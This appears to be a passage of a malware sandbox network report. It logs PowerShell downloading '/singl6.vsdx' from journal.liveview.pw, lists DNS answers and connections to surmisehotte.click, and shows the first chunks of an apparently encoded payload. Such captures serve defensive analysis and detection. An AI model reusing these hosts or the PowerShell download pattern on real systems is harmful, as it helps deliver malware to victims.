                                                                      Dec 24, 2024 08:29:27.768301010 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:27.768321991 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:27.768372059 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:27.768452883 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:27.810094118 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:27.810115099 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:27.810197115 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:27.810226917 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:27.810240030 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:27.810326099 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:27.822705030 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:27.822762012 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:27.822786093 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:27.822792053 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:27.822814941 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:27.822868109 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:27.825763941 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:30:53.682848930 CET49958443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:53.682944059 CET44349958104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:53.683024883 CET49958443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:53.684150934 CET49958443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:53.684207916 CET44349958104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:54.938905001 CET44349958104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:54.938999891 CET49958443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:54.940511942 CET49958443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:54.940541029 CET44349958104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:54.940912008 CET44349958104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:54.982702971 CET49958443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:54.982702971 CET49958443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:54.982851028 CET44349958104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:55.679976940 CET44349958104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:55.680092096 CET44349958104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:55.680150032 CET49958443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:55.682425976 CET49958443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:55.682456970 CET44349958104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:55.682698965 CET49958443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:55.682708979 CET44349958104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:55.691111088 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:55.691143036 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:55.691457987 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:55.692826986 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:55.692837000 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:56.919475079 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:56.919568062 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:56.920953035 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:56.920958996 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:56.921279907 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:56.922389984 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:56.922419071 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:56.922455072 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:57.972733021 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:57.972795010 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:57.972832918 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:57.972866058 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:57.972875118 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:57.972887039 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:57.972913027 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:57.972956896 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:57.973222017 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:57.973228931 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:57.981033087 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:57.982536077 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:57.982541084 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:57.997631073 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:57.999125957 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:57.999131918 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:58.047883034 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:58.092331886 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:58.141613960 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:58.141623020 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:58.170890093 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:58.170949936 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:58.170950890 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:58.170967102 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:58.171013117 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:58.171017885 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:58.171092987 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:58.171140909 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:58.171226978 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:58.171240091 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:58.171252012 CET49964443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:58.171257019 CET44349964104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:58.286595106 CET49971443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:58.286665916 CET44349971104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:58.286731005 CET49971443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:58.286993980 CET49971443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:58.287012100 CET44349971104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:59.497895956 CET44349971104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:59.497997046 CET49971443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:59.503109932 CET49971443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:59.503140926 CET44349971104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:59.503676891 CET44349971104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:30:59.504750967 CET49971443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:59.504853010 CET49971443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:30:59.504899979 CET44349971104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:00.422853947 CET44349971104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:00.422934055 CET44349971104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:00.426209927 CET49971443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:00.426274061 CET49971443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:00.426301003 CET44349971104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:00.440370083 CET49976443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:00.440402031 CET44349976104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:00.440495968 CET49976443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:00.440758944 CET49976443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:00.440768957 CET44349976104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:01.655013084 CET44349976104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:01.655082941 CET49976443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:01.665716887 CET49976443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:01.665729046 CET44349976104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:01.665965080 CET44349976104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:01.667227983 CET49976443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:01.667629957 CET49976443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:01.667650938 CET44349976104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:01.667692900 CET49976443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:01.715328932 CET44349976104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:02.519439936 CET44349976104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:02.519535065 CET44349976104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:02.519597054 CET49976443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:02.537405014 CET49976443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:02.537419081 CET44349976104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:02.892451048 CET49982443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:02.892494917 CET44349982104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:02.892585993 CET49982443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:02.893114090 CET49982443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:02.893126965 CET44349982104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:04.101125002 CET44349982104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:04.101207018 CET49982443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:04.102545977 CET49982443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:04.102552891 CET44349982104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:04.102778912 CET44349982104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:04.107295990 CET49982443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:04.107398033 CET49982443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:04.107429981 CET44349982104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:04.107490063 CET49982443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:04.107500076 CET44349982104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:05.022964001 CET44349982104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:05.023053885 CET44349982104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:05.023143053 CET49982443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:05.023698092 CET49982443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:05.023718119 CET44349982104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:05.157953024 CET49989443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:05.157980919 CET44349989104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:05.158052921 CET49989443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:05.158288002 CET49989443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:05.158296108 CET44349989104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:06.366641045 CET44349989104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:06.366739988 CET49989443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:06.368086100 CET49989443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:06.368091106 CET44349989104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:06.368280888 CET44349989104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:06.369431019 CET49989443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:06.369517088 CET49989443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:06.369522095 CET44349989104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:07.135091066 CET44349989104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:07.135193110 CET44349989104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:07.135248899 CET49989443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:07.150511980 CET49989443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:07.150527954 CET44349989104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:08.218851089 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:08.218955040 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:08.219041109 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:08.219310045 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:08.219360113 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.431941986 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.432037115 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.433147907 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.433183908 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.433521032 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.437562943 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.438220978 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.438280106 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.440397024 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.440462112 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.444307089 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.444360971 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.447711945 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.447758913 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.447928905 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.447968006 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.448395014 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.448447943 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.448472977 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.448502064 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.448688984 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.448725939 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.448781013 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.452580929 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.452625990 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.495332956 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.496543884 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.496584892 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.496623039 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.496659040 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.496699095 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.496716976 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:09.496781111 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:09.496802092 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:11.819631100 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:11.819735050 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:11.819809914 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:11.819895029 CET49995443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:11.819937944 CET44349995104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:11.824076891 CET49996443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:11.824124098 CET44349996104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:11.824199915 CET49996443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:11.824430943 CET49996443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:11.824444056 CET44349996104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:13.036458015 CET44349996104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:13.036557913 CET49996443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:13.059676886 CET49996443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:13.059716940 CET44349996104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:13.060064077 CET44349996104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:13.061209917 CET49996443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:13.061233997 CET49996443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:13.061292887 CET44349996104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:13.848947048 CET44349996104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:13.849051952 CET44349996104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:13.849096060 CET49996443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:13.849337101 CET49996443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:13.849356890 CET44349996104.21.64.1192.168.2.6
                                                                      Dec 24, 2024 08:31:13.849365950 CET49996443192.168.2.6104.21.64.1
                                                                      Dec 24, 2024 08:31:13.849371910 CET44349996104.21.64.1192.168.2.6

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 24, 2024 08:29:09.526961088 CET5326653192.168.2.61.1.1.1
                                                                      Dec 24, 2024 08:29:09.838577986 CET53532661.1.1.1192.168.2.6
                                                                      Dec 24, 2024 08:30:53.365917921 CET5952453192.168.2.61.1.1.1
                                                                      Dec 24, 2024 08:30:53.676523924 CET53595241.1.1.1192.168.2.6

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Dec 24, 2024 08:29:09.526961088 CET192.168.2.61.1.1.10xb18cStandard query (0)journal.liveview.pwA (IP address)IN (0x0001)false
                                                                      Dec 24, 2024 08:30:53.365917921 CET192.168.2.61.1.1.10x15e0Standard query (0)surmisehotte.clickA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Dec 24, 2024 08:29:09.838577986 CET1.1.1.1192.168.2.60xb18cNo error (0)journal.liveview.pw104.21.37.173A (IP address)IN (0x0001)false
                                                                      Dec 24, 2024 08:29:09.838577986 CET1.1.1.1192.168.2.60xb18cNo error (0)journal.liveview.pw172.67.210.199A (IP address)IN (0x0001)false
                                                                      Dec 24, 2024 08:30:53.676523924 CET1.1.1.1192.168.2.60x15e0No error (0)surmisehotte.click104.21.64.1A (IP address)IN (0x0001)false
                                                                      Dec 24, 2024 08:30:53.676523924 CET1.1.1.1192.168.2.60x15e0No error (0)surmisehotte.click104.21.96.1A (IP address)IN (0x0001)false
                                                                      Dec 24, 2024 08:30:53.676523924 CET1.1.1.1192.168.2.60x15e0No error (0)surmisehotte.click104.21.80.1A (IP address)IN (0x0001)false
                                                                      Dec 24, 2024 08:30:53.676523924 CET1.1.1.1192.168.2.60x15e0No error (0)surmisehotte.click104.21.48.1A (IP address)IN (0x0001)false
                                                                      Dec 24, 2024 08:30:53.676523924 CET1.1.1.1192.168.2.60x15e0No error (0)surmisehotte.click104.21.16.1A (IP address)IN (0x0001)false
                                                                      Dec 24, 2024 08:30:53.676523924 CET1.1.1.1192.168.2.60x15e0No error (0)surmisehotte.click104.21.32.1A (IP address)IN (0x0001)false
                                                                      Dec 24, 2024 08:30:53.676523924 CET1.1.1.1192.168.2.60x15e0No error (0)surmisehotte.click104.21.112.1A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • journal.liveview.pw
                                                                      • surmisehotte.click

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.649719104.21.37.1734433184C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-24 07:29:11 UTC80OUTGET /singl6.vsdx HTTP/1.1
                                                                      Host: journal.liveview.pw
                                                                      Connection: Keep-Alive
                                                                      2024-12-24 07:29:11 UTC989INHTTP/1.1 200 OK
                                                                      Date: Tue, 24 Dec 2024 07:29:11 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 10676100
                                                                      Connection: close
                                                                      X-Powered-By: Express
                                                                      ETag: W/"a2e784-rvlBQ2QbU230PMdhjioter3dS9Y"
                                                                      Set-Cookie: connect.sid=s%3AhzkSLvah2Zq0WPKaYl90hriunOaL4_mS.F%2BxCHQ0nDG70D7vLZzD4LulXIyuS7AdVUnbCtA35j%2FM; Path=/; HttpOnly
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BiNEchYsvo%2BYnrvNYtGpOvuiMKrKDh27%2BZc0ooc09fcDQAwmzHlHcML7mz9B%2Bluu8Id1lpOhDNu%2BGJlxKSP0qMejYyjesc7pnZS3K371uAidldXEllNBVKnnQ723pGzaYRDfthJP"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8f6ee0fdea5a8c8a-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1989&rtt_var=755&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=694&delivery_rate=1439842&cwnd=248&unsent_bytes=0&cid=a94bb3db74cbcaea&ts=703&x=0"
                                                                      2024-12-24 07:29:11 UTC1369INData Raw: 24 4f 53 39 4c 76 4d 71 72 52 37 30 59 58 6a 42 57 42 73 7a 53 58 7a 56 35 6f 4d 6e 42 33 6b 58 69 67 31 74 53 4f 6b 4c 73 71 65 77 46 35 62 64 4f 4a 35 6b 6d 59 54 53 62 34 76 79 49 4e 42 4a 50 42 6f 38 43 53 50 57 42 48 50 54 69 31 36 53 7a 42 30 65 4f 4c 58 44 47 43 6b 61 4c 55 30 61 45 55 32 55 79 51 42 73 51 7a 36 76 6a 61 4e 4c 75 66 30 53 6e 57 4d 6c 70 32 73 52 7a 37 39 36 42 48 55 4f 65 31 77 34 66 30 42 42 78 33 4a 6b 41 6f 43 67 70 6b 73 67 63 30 74 4f 61 77 32 33 46 69 35 58 54 4a 38 36 39 39 4d 64 4c 66 77 70 39 54 32 6c 42 67 5a 5a 6a 74 4d 65 73 6f 56 4f 36 43 6e 4a 73 73 75 58 42 6b 6c 43 61 55 36 79 45 70 49 48 47 6a 4e 57 7a 45 52 4f 78 68 42 38 6e 44 55 4a 42 44 73 36 44 64 37 66 35 6e 67 43 65 51 37 61 42 49 70 46 6a 4a 6d 6f 63 70 66
                                                                      Data Ascii: $OS9LvMqrR70YXjBWBszSXzV5oMnB3kXig1tSOkLsqewF5bdOJ5kmYTSb4vyINBJPBo8CSPWBHPTi16SzB0eOLXDGCkaLU0aEU2UyQBsQz6vjaNLuf0SnWMlp2sRz796BHUOe1w4f0BBx3JkAoCgpksgc0tOaw23Fi5XTJ8699MdLfwp9T2lBgZZjtMesoVO6CnJssuXBklCaU6yEpIHGjNWzEROxhB8nDUJBDs6Dd7f5ngCeQ7aBIpFjJmocpf
                                                                      2024-12-24 07:29:11 UTC1369INData Raw: 55 6b 36 71 56 57 33 48 41 52 62 4b 64 30 65 33 6e 57 4c 6c 46 33 50 6d 48 54 75 57 77 6a 75 42 36 69 33 4d 4f 4d 61 78 61 77 76 36 57 65 53 56 6d 31 5a 54 54 39 52 75 61 62 62 6a 32 4e 52 62 53 46 41 61 4f 51 55 36 39 39 44 57 74 58 30 46 4a 75 70 7a 52 75 36 4a 67 63 5a 4e 4a 7a 74 44 39 58 53 6d 33 62 6c 44 63 53 50 59 76 75 54 6c 46 74 71 37 6c 41 57 73 53 4f 41 51 56 53 64 6a 4d 6b 68 7a 63 58 7a 51 63 66 64 32 45 7a 70 59 4d 4e 34 58 74 54 63 42 63 6f 67 76 79 77 59 53 70 59 75 4a 43 38 55 53 6e 53 50 4a 41 64 41 7a 78 42 43 34 4d 41 44 71 36 54 34 79 55 63 42 38 54 68 74 79 4c 59 70 49 52 31 78 35 56 47 6a 4d 4f 33 55 62 33 73 66 37 32 55 38 74 39 6c 73 37 68 4b 47 41 32 6c 4a 68 54 32 67 49 79 62 6d 51 70 37 62 63 73 56 31 47 30 70 6c 68 4a 76 63
                                                                      Data Ascii: Uk6qVW3HARbKd0e3nWLlF3PmHTuWwjuB6i3MOMaxawv6WeSVm1ZTT9Ruabbj2NRbSFAaOQU699DWtX0FJupzRu6JgcZNJztD9XSm3blDcSPYvuTlFtq7lAWsSOAQVSdjMkhzcXzQcfd2EzpYMN4XtTcBcogvywYSpYuJC8USnSPJAdAzxBC4MADq6T4yUcB8ThtyLYpIR1x5VGjMO3Ub3sf72U8t9ls7hKGA2lJhT2gIybmQp7bcsV1G0plhJvc
                                                                      2024-12-24 07:29:11 UTC1369INData Raw: 4d 73 4f 4a 61 37 36 41 79 53 51 72 4e 77 37 62 4b 46 6b 77 71 37 43 48 38 53 51 50 71 37 34 57 78 78 4e 38 69 32 46 78 69 4f 30 67 48 4c 6b 67 52 51 47 37 76 4a 48 71 4f 72 62 4e 70 35 48 44 41 45 4b 4f 79 6c 43 53 35 78 79 71 65 35 48 34 38 6f 34 35 37 35 48 33 6d 76 6b 42 49 46 70 39 6a 78 6c 6a 58 4d 46 69 4e 37 77 6e 6c 66 59 68 36 30 47 4a 74 4e 61 38 4d 4f 59 68 6d 78 36 70 39 57 4e 55 36 30 43 74 59 33 50 55 77 63 32 4e 61 6c 4c 4e 43 54 31 31 38 74 48 43 52 43 43 46 7a 6d 64 4f 4c 73 48 67 75 62 69 30 32 67 6e 58 35 6f 31 5a 75 47 39 77 55 45 58 59 72 69 68 58 57 63 4f 41 76 4f 37 42 51 4c 38 4e 4d 6b 46 70 63 78 6a 5a 66 67 44 4c 61 52 39 35 52 48 48 79 6c 67 32 30 43 69 76 57 36 72 70 51 4d 77 45 6d 46 57 71 4d 75 6a 49 6e 5a 6e 46 51 38 55 41
                                                                      Data Ascii: MsOJa76AySQrNw7bKFkwq7CH8SQPq74WxxN8i2FxiO0gHLkgRQG7vJHqOrbNp5HDAEKOylCS5xyqe5H48o4575H3mvkBIFp9jxljXMFiN7wnlfYh60GJtNa8MOYhmx6p9WNU60CtY3PUwc2NalLNCT118tHCRCCFzmdOLsHgubi02gnX5o1ZuG9wUEXYrihXWcOAvO7BQL8NMkFpcxjZfgDLaR95RHHylg20CivW6rpQMwEmFWqMujInZnFQ8UA
